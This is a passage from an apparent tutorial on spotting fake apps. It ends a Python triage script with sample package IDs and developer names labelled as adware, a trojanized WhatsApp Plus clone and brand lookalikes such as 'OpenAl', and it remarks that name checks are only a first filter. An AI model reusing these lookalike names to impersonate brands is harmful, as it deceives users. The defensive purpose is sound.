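    "com.openai.dalle3umagic",       # (page) adware clone
    "com.wkwaplapphfm.messengerse",  # (page) trojanized WhatsApp Plus
    "Open-AI Inc.",                  # constructed developer name
    "OpenAl",                        # constructed: lowercase L in place of i
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample:32} {triage(sample)}")
```

The trojanized WhatsApp Plus package comes back as `no-brand-match`: its identifier carries no brand string at all, so a name check is a first filter only and does not replace the permission and scanning tips in the list.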
